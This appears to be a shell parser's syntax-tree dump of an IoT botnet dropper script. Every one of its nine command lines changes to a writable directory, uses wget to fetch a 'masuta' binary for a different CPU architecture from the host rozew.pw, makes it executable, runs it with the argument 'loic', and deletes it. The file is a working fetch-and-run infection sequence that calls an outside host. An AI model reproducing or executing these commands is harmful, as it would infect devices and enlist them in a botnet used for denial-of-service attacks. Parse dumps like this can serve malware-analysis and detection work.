ListNode(lineno=2, pos=(12, 141), parts=[
  CommandNode(lineno=2, pos=(12, 19), parts=[
    WordNode(lineno=2, pos=(12, 14), word='cd'),
    WordNode(lineno=2, pos=(15, 19), word='/tmp'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(20, 22)),
  CommandNode(lineno=2, pos=(23, 34), parts=[
    WordNode(lineno=2, pos=(23, 25), word='cd'),
    WordNode(lineno=2, pos=(26, 34), word='/var/run'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(35, 37)),
  CommandNode(lineno=2, pos=(38, 45), parts=[
    WordNode(lineno=2, pos=(38, 40), word='cd'),
    WordNode(lineno=2, pos=(41, 45), word='/mnt'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(46, 48)),
  CommandNode(lineno=2, pos=(49, 57), parts=[
    WordNode(lineno=2, pos=(49, 51), word='cd'),
    WordNode(lineno=2, pos=(52, 57), word='/root'),
  ]),
  OperatorNode(lineno=2, op='||', pos=(58, 60)),
  CommandNode(lineno=2, pos=(61, 65), parts=[
    WordNode(lineno=2, pos=(61, 63), word='cd'),
    WordNode(lineno=2, pos=(64, 65), word='/'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(65, 66)),
  CommandNode(lineno=2, pos=(67, 109), parts=[
    WordNode(lineno=2, pos=(67, 71), word='wget'),
    WordNode(lineno=2, pos=(72, 104), word='http://rozew.pw/bins/masuta.mips'),
    WordNode(lineno=2, pos=(105, 107), word='-O'),
    WordNode(lineno=2, pos=(108, 109), word='a'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(109, 110)),
  CommandNode(lineno=2, pos=(111, 121), parts=[
    WordNode(lineno=2, pos=(111, 116), word='chmod'),
    WordNode(lineno=2, pos=(117, 119), word='+x'),
    WordNode(lineno=2, pos=(120, 121), word='a'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(121, 122)),
  CommandNode(lineno=2, pos=(123, 131), parts=[
    WordNode(lineno=2, pos=(123, 126), word='./a'),
    WordNode(lineno=2, pos=(127, 131), word='loic'),
  ]),
  OperatorNode(lineno=2, op=';', pos=(131, 132)),
  CommandNode(lineno=2, pos=(133, 141), parts=[
    WordNode(lineno=2, pos=(133, 135), word='rm'),
    WordNode(lineno=2, pos=(136, 139), word='-rf'),
    WordNode(lineno=2, pos=(140, 141), word='a'),
  ]),
])
ListNode(lineno=3, pos=(142, 270), parts=[
  CommandNode(lineno=3, pos=(142, 149), parts=[
    WordNode(lineno=3, pos=(142, 144), word='cd'),
    WordNode(lineno=3, pos=(145, 149), word='/tmp'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(150, 152)),
  CommandNode(lineno=3, pos=(153, 164), parts=[
    WordNode(lineno=3, pos=(153, 155), word='cd'),
    WordNode(lineno=3, pos=(156, 164), word='/var/run'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(165, 167)),
  CommandNode(lineno=3, pos=(168, 175), parts=[
    WordNode(lineno=3, pos=(168, 170), word='cd'),
    WordNode(lineno=3, pos=(171, 175), word='/mnt'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(176, 178)),
  CommandNode(lineno=3, pos=(179, 187), parts=[
    WordNode(lineno=3, pos=(179, 181), word='cd'),
    WordNode(lineno=3, pos=(182, 187), word='/root'),
  ]),
  OperatorNode(lineno=3, op='||', pos=(188, 190)),
  CommandNode(lineno=3, pos=(191, 195), parts=[
    WordNode(lineno=3, pos=(191, 193), word='cd'),
    WordNode(lineno=3, pos=(194, 195), word='/'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(195, 196)),
  CommandNode(lineno=3, pos=(197, 238), parts=[
    WordNode(lineno=3, pos=(197, 201), word='wget'),
    WordNode(lineno=3, pos=(202, 233), word='http://rozew.pw/bins/masuta.x86'),
    WordNode(lineno=3, pos=(234, 236), word='-O'),
    WordNode(lineno=3, pos=(237, 238), word='b'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(238, 239)),
  CommandNode(lineno=3, pos=(240, 250), parts=[
    WordNode(lineno=3, pos=(240, 245), word='chmod'),
    WordNode(lineno=3, pos=(246, 248), word='+x'),
    WordNode(lineno=3, pos=(249, 250), word='b'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(250, 251)),
  CommandNode(lineno=3, pos=(252, 260), parts=[
    WordNode(lineno=3, pos=(252, 255), word='./b'),
    WordNode(lineno=3, pos=(256, 260), word='loic'),
  ]),
  OperatorNode(lineno=3, op=';', pos=(260, 261)),
  CommandNode(lineno=3, pos=(262, 270), parts=[
    WordNode(lineno=3, pos=(262, 264), word='rm'),
    WordNode(lineno=3, pos=(265, 268), word='-rf'),
    WordNode(lineno=3, pos=(269, 270), word='b'),
  ]),
])
ListNode(lineno=4, pos=(271, 399), parts=[
  CommandNode(lineno=4, pos=(271, 278), parts=[
    WordNode(lineno=4, pos=(271, 273), word='cd'),
    WordNode(lineno=4, pos=(274, 278), word='/tmp'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(279, 281)),
  CommandNode(lineno=4, pos=(282, 293), parts=[
    WordNode(lineno=4, pos=(282, 284), word='cd'),
    WordNode(lineno=4, pos=(285, 293), word='/var/run'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(294, 296)),
  CommandNode(lineno=4, pos=(297, 304), parts=[
    WordNode(lineno=4, pos=(297, 299), word='cd'),
    WordNode(lineno=4, pos=(300, 304), word='/mnt'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(305, 307)),
  CommandNode(lineno=4, pos=(308, 316), parts=[
    WordNode(lineno=4, pos=(308, 310), word='cd'),
    WordNode(lineno=4, pos=(311, 316), word='/root'),
  ]),
  OperatorNode(lineno=4, op='||', pos=(317, 319)),
  CommandNode(lineno=4, pos=(320, 324), parts=[
    WordNode(lineno=4, pos=(320, 322), word='cd'),
    WordNode(lineno=4, pos=(323, 324), word='/'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(324, 325)),
  CommandNode(lineno=4, pos=(326, 367), parts=[
    WordNode(lineno=4, pos=(326, 330), word='wget'),
    WordNode(lineno=4, pos=(331, 362), word='http://rozew.pw/bins/masuta.ppc'),
    WordNode(lineno=4, pos=(363, 365), word='-O'),
    WordNode(lineno=4, pos=(366, 367), word='c'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(367, 368)),
  CommandNode(lineno=4, pos=(369, 379), parts=[
    WordNode(lineno=4, pos=(369, 374), word='chmod'),
    WordNode(lineno=4, pos=(375, 377), word='+x'),
    WordNode(lineno=4, pos=(378, 379), word='c'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(379, 380)),
  CommandNode(lineno=4, pos=(381, 389), parts=[
    WordNode(lineno=4, pos=(381, 384), word='./c'),
    WordNode(lineno=4, pos=(385, 389), word='loic'),
  ]),
  OperatorNode(lineno=4, op=';', pos=(389, 390)),
  CommandNode(lineno=4, pos=(391, 399), parts=[
    WordNode(lineno=4, pos=(391, 393), word='rm'),
    WordNode(lineno=4, pos=(394, 397), word='-rf'),
    WordNode(lineno=4, pos=(398, 399), word='c'),
  ]),
])
ListNode(lineno=5, pos=(400, 528), parts=[
  CommandNode(lineno=5, pos=(400, 407), parts=[
    WordNode(lineno=5, pos=(400, 402), word='cd'),
    WordNode(lineno=5, pos=(403, 407), word='/tmp'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(408, 410)),
  CommandNode(lineno=5, pos=(411, 422), parts=[
    WordNode(lineno=5, pos=(411, 413), word='cd'),
    WordNode(lineno=5, pos=(414, 422), word='/var/run'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(423, 425)),
  CommandNode(lineno=5, pos=(426, 433), parts=[
    WordNode(lineno=5, pos=(426, 428), word='cd'),
    WordNode(lineno=5, pos=(429, 433), word='/mnt'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(434, 436)),
  CommandNode(lineno=5, pos=(437, 445), parts=[
    WordNode(lineno=5, pos=(437, 439), word='cd'),
    WordNode(lineno=5, pos=(440, 445), word='/root'),
  ]),
  OperatorNode(lineno=5, op='||', pos=(446, 448)),
  CommandNode(lineno=5, pos=(449, 453), parts=[
    WordNode(lineno=5, pos=(449, 451), word='cd'),
    WordNode(lineno=5, pos=(452, 453), word='/'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(453, 454)),
  CommandNode(lineno=5, pos=(455, 496), parts=[
    WordNode(lineno=5, pos=(455, 459), word='wget'),
    WordNode(lineno=5, pos=(460, 491), word='http://rozew.pw/bins/masuta.sh4'),
    WordNode(lineno=5, pos=(492, 494), word='-O'),
    WordNode(lineno=5, pos=(495, 496), word='d'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(496, 497)),
  CommandNode(lineno=5, pos=(498, 508), parts=[
    WordNode(lineno=5, pos=(498, 503), word='chmod'),
    WordNode(lineno=5, pos=(504, 506), word='+x'),
    WordNode(lineno=5, pos=(507, 508), word='d'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(508, 509)),
  CommandNode(lineno=5, pos=(510, 518), parts=[
    WordNode(lineno=5, pos=(510, 513), word='./d'),
    WordNode(lineno=5, pos=(514, 518), word='loic'),
  ]),
  OperatorNode(lineno=5, op=';', pos=(518, 519)),
  CommandNode(lineno=5, pos=(520, 528), parts=[
    WordNode(lineno=5, pos=(520, 522), word='rm'),
    WordNode(lineno=5, pos=(523, 526), word='-rf'),
    WordNode(lineno=5, pos=(527, 528), word='d'),
  ]),
])
ListNode(lineno=6, pos=(529, 657), parts=[
  CommandNode(lineno=6, pos=(529, 536), parts=[
    WordNode(lineno=6, pos=(529, 531), word='cd'),
    WordNode(lineno=6, pos=(532, 536), word='/tmp'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(537, 539)),
  CommandNode(lineno=6, pos=(540, 551), parts=[
    WordNode(lineno=6, pos=(540, 542), word='cd'),
    WordNode(lineno=6, pos=(543, 551), word='/var/run'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(552, 554)),
  CommandNode(lineno=6, pos=(555, 562), parts=[
    WordNode(lineno=6, pos=(555, 557), word='cd'),
    WordNode(lineno=6, pos=(558, 562), word='/mnt'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(563, 565)),
  CommandNode(lineno=6, pos=(566, 574), parts=[
    WordNode(lineno=6, pos=(566, 568), word='cd'),
    WordNode(lineno=6, pos=(569, 574), word='/root'),
  ]),
  OperatorNode(lineno=6, op='||', pos=(575, 577)),
  CommandNode(lineno=6, pos=(578, 582), parts=[
    WordNode(lineno=6, pos=(578, 580), word='cd'),
    WordNode(lineno=6, pos=(581, 582), word='/'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(582, 583)),
  CommandNode(lineno=6, pos=(584, 625), parts=[
    WordNode(lineno=6, pos=(584, 588), word='wget'),
    WordNode(lineno=6, pos=(589, 620), word='http://rozew.pw/bins/masuta.arm'),
    WordNode(lineno=6, pos=(621, 623), word='-O'),
    WordNode(lineno=6, pos=(624, 625), word='e'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(625, 626)),
  CommandNode(lineno=6, pos=(627, 637), parts=[
    WordNode(lineno=6, pos=(627, 632), word='chmod'),
    WordNode(lineno=6, pos=(633, 635), word='+x'),
    WordNode(lineno=6, pos=(636, 637), word='e'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(637, 638)),
  CommandNode(lineno=6, pos=(639, 647), parts=[
    WordNode(lineno=6, pos=(639, 642), word='./e'),
    WordNode(lineno=6, pos=(643, 647), word='loic'),
  ]),
  OperatorNode(lineno=6, op=';', pos=(647, 648)),
  CommandNode(lineno=6, pos=(649, 657), parts=[
    WordNode(lineno=6, pos=(649, 651), word='rm'),
    WordNode(lineno=6, pos=(652, 655), word='-rf'),
    WordNode(lineno=6, pos=(656, 657), word='e'),
  ]),
])
ListNode(lineno=7, pos=(658, 787), parts=[
  CommandNode(lineno=7, pos=(658, 665), parts=[
    WordNode(lineno=7, pos=(658, 660), word='cd'),
    WordNode(lineno=7, pos=(661, 665), word='/tmp'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(666, 668)),
  CommandNode(lineno=7, pos=(669, 680), parts=[
    WordNode(lineno=7, pos=(669, 671), word='cd'),
    WordNode(lineno=7, pos=(672, 680), word='/var/run'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(681, 683)),
  CommandNode(lineno=7, pos=(684, 691), parts=[
    WordNode(lineno=7, pos=(684, 686), word='cd'),
    WordNode(lineno=7, pos=(687, 691), word='/mnt'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(692, 694)),
  CommandNode(lineno=7, pos=(695, 703), parts=[
    WordNode(lineno=7, pos=(695, 697), word='cd'),
    WordNode(lineno=7, pos=(698, 703), word='/root'),
  ]),
  OperatorNode(lineno=7, op='||', pos=(704, 706)),
  CommandNode(lineno=7, pos=(707, 711), parts=[
    WordNode(lineno=7, pos=(707, 709), word='cd'),
    WordNode(lineno=7, pos=(710, 711), word='/'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(711, 712)),
  CommandNode(lineno=7, pos=(713, 755), parts=[
    WordNode(lineno=7, pos=(713, 717), word='wget'),
    WordNode(lineno=7, pos=(718, 750), word='http://rozew.pw/bins/masuta.arm6'),
    WordNode(lineno=7, pos=(751, 753), word='-O'),
    WordNode(lineno=7, pos=(754, 755), word='f'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(755, 756)),
  CommandNode(lineno=7, pos=(757, 767), parts=[
    WordNode(lineno=7, pos=(757, 762), word='chmod'),
    WordNode(lineno=7, pos=(763, 765), word='+x'),
    WordNode(lineno=7, pos=(766, 767), word='f'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(767, 768)),
  CommandNode(lineno=7, pos=(769, 777), parts=[
    WordNode(lineno=7, pos=(769, 772), word='./f'),
    WordNode(lineno=7, pos=(773, 777), word='loic'),
  ]),
  OperatorNode(lineno=7, op=';', pos=(777, 778)),
  CommandNode(lineno=7, pos=(779, 787), parts=[
    WordNode(lineno=7, pos=(779, 781), word='rm'),
    WordNode(lineno=7, pos=(782, 785), word='-rf'),
    WordNode(lineno=7, pos=(786, 787), word='f'),
  ]),
])
ListNode(lineno=8, pos=(788, 917), parts=[
  CommandNode(lineno=8, pos=(788, 795), parts=[
    WordNode(lineno=8, pos=(788, 790), word='cd'),
    WordNode(lineno=8, pos=(791, 795), word='/tmp'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(796, 798)),
  CommandNode(lineno=8, pos=(799, 810), parts=[
    WordNode(lineno=8, pos=(799, 801), word='cd'),
    WordNode(lineno=8, pos=(802, 810), word='/var/run'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(811, 813)),
  CommandNode(lineno=8, pos=(814, 821), parts=[
    WordNode(lineno=8, pos=(814, 816), word='cd'),
    WordNode(lineno=8, pos=(817, 821), word='/mnt'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(822, 824)),
  CommandNode(lineno=8, pos=(825, 833), parts=[
    WordNode(lineno=8, pos=(825, 827), word='cd'),
    WordNode(lineno=8, pos=(828, 833), word='/root'),
  ]),
  OperatorNode(lineno=8, op='||', pos=(834, 836)),
  CommandNode(lineno=8, pos=(837, 841), parts=[
    WordNode(lineno=8, pos=(837, 839), word='cd'),
    WordNode(lineno=8, pos=(840, 841), word='/'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(841, 842)),
  CommandNode(lineno=8, pos=(843, 885), parts=[
    WordNode(lineno=8, pos=(843, 847), word='wget'),
    WordNode(lineno=8, pos=(848, 880), word='http://rozew.pw/bins/masuta.arm7'),
    WordNode(lineno=8, pos=(881, 883), word='-O'),
    WordNode(lineno=8, pos=(884, 885), word='g'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(885, 886)),
  CommandNode(lineno=8, pos=(887, 897), parts=[
    WordNode(lineno=8, pos=(887, 892), word='chmod'),
    WordNode(lineno=8, pos=(893, 895), word='+x'),
    WordNode(lineno=8, pos=(896, 897), word='g'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(897, 898)),
  CommandNode(lineno=8, pos=(899, 907), parts=[
    WordNode(lineno=8, pos=(899, 902), word='./g'),
    WordNode(lineno=8, pos=(903, 907), word='loic'),
  ]),
  OperatorNode(lineno=8, op=';', pos=(907, 908)),
  CommandNode(lineno=8, pos=(909, 917), parts=[
    WordNode(lineno=8, pos=(909, 911), word='rm'),
    WordNode(lineno=8, pos=(912, 915), word='-rf'),
    WordNode(lineno=8, pos=(916, 917), word='g'),
  ]),
])
ListNode(lineno=9, pos=(918, 1047), parts=[
  CommandNode(lineno=9, pos=(918, 925), parts=[
    WordNode(lineno=9, pos=(918, 920), word='cd'),
    WordNode(lineno=9, pos=(921, 925), word='/tmp'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(926, 928)),
  CommandNode(lineno=9, pos=(929, 940), parts=[
    WordNode(lineno=9, pos=(929, 931), word='cd'),
    WordNode(lineno=9, pos=(932, 940), word='/var/run'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(941, 943)),
  CommandNode(lineno=9, pos=(944, 951), parts=[
    WordNode(lineno=9, pos=(944, 946), word='cd'),
    WordNode(lineno=9, pos=(947, 951), word='/mnt'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(952, 954)),
  CommandNode(lineno=9, pos=(955, 963), parts=[
    WordNode(lineno=9, pos=(955, 957), word='cd'),
    WordNode(lineno=9, pos=(958, 963), word='/root'),
  ]),
  OperatorNode(lineno=9, op='||', pos=(964, 966)),
  CommandNode(lineno=9, pos=(967, 971), parts=[
    WordNode(lineno=9, pos=(967, 969), word='cd'),
    WordNode(lineno=9, pos=(970, 971), word='/'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(971, 972)),
  CommandNode(lineno=9, pos=(973, 1015), parts=[
    WordNode(lineno=9, pos=(973, 977), word='wget'),
    WordNode(lineno=9, pos=(978, 1010), word='http://rozew.pw/bins/masuta.mpsl'),
    WordNode(lineno=9, pos=(1011, 1013), word='-O'),
    WordNode(lineno=9, pos=(1014, 1015), word='h'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1015, 1016)),
  CommandNode(lineno=9, pos=(1017, 1027), parts=[
    WordNode(lineno=9, pos=(1017, 1022), word='chmod'),
    WordNode(lineno=9, pos=(1023, 1025), word='+x'),
    WordNode(lineno=9, pos=(1026, 1027), word='h'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1027, 1028)),
  CommandNode(lineno=9, pos=(1029, 1037), parts=[
    WordNode(lineno=9, pos=(1029, 1032), word='./h'),
    WordNode(lineno=9, pos=(1033, 1037), word='loic'),
  ]),
  OperatorNode(lineno=9, op=';', pos=(1037, 1038)),
  CommandNode(lineno=9, pos=(1039, 1047), parts=[
    WordNode(lineno=9, pos=(1039, 1041), word='rm'),
    WordNode(lineno=9, pos=(1042, 1045), word='-rf'),
    WordNode(lineno=9, pos=(1046, 1047), word='h'),
  ]),
])
ListNode(lineno=10, pos=(1048, 1176), parts=[
  CommandNode(lineno=10, pos=(1048, 1055), parts=[
    WordNode(lineno=10, pos=(1048, 1050), word='cd'),
    WordNode(lineno=10, pos=(1051, 1055), word='/tmp'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1056, 1058)),
  CommandNode(lineno=10, pos=(1059, 1070), parts=[
    WordNode(lineno=10, pos=(1059, 1061), word='cd'),
    WordNode(lineno=10, pos=(1062, 1070), word='/var/run'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1071, 1073)),
  CommandNode(lineno=10, pos=(1074, 1081), parts=[
    WordNode(lineno=10, pos=(1074, 1076), word='cd'),
    WordNode(lineno=10, pos=(1077, 1081), word='/mnt'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1082, 1084)),
  CommandNode(lineno=10, pos=(1085, 1093), parts=[
    WordNode(lineno=10, pos=(1085, 1087), word='cd'),
    WordNode(lineno=10, pos=(1088, 1093), word='/root'),
  ]),
  OperatorNode(lineno=10, op='||', pos=(1094, 1096)),
  CommandNode(lineno=10, pos=(1097, 1101), parts=[
    WordNode(lineno=10, pos=(1097, 1099), word='cd'),
    WordNode(lineno=10, pos=(1100, 1101), word='/'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1101, 1102)),
  CommandNode(lineno=10, pos=(1103, 1144), parts=[
    WordNode(lineno=10, pos=(1103, 1107), word='wget'),
    WordNode(lineno=10, pos=(1108, 1139), word='http://rozew.pw/bins/masuta.sh4'),
    WordNode(lineno=10, pos=(1140, 1142), word='-O'),
    WordNode(lineno=10, pos=(1143, 1144), word='i'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1144, 1145)),
  CommandNode(lineno=10, pos=(1146, 1156), parts=[
    WordNode(lineno=10, pos=(1146, 1151), word='chmod'),
    WordNode(lineno=10, pos=(1152, 1154), word='+x'),
    WordNode(lineno=10, pos=(1155, 1156), word='i'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1156, 1157)),
  CommandNode(lineno=10, pos=(1158, 1166), parts=[
    WordNode(lineno=10, pos=(1158, 1161), word='./i'),
    WordNode(lineno=10, pos=(1162, 1166), word='loic'),
  ]),
  OperatorNode(lineno=10, op=';', pos=(1166, 1167)),
  CommandNode(lineno=10, pos=(1168, 1176), parts=[
    WordNode(lineno=10, pos=(1168, 1170), word='rm'),
    WordNode(lineno=10, pos=(1171, 1174), word='-rf'),
    WordNode(lineno=10, pos=(1175, 1176), word='i'),
  ]),
])
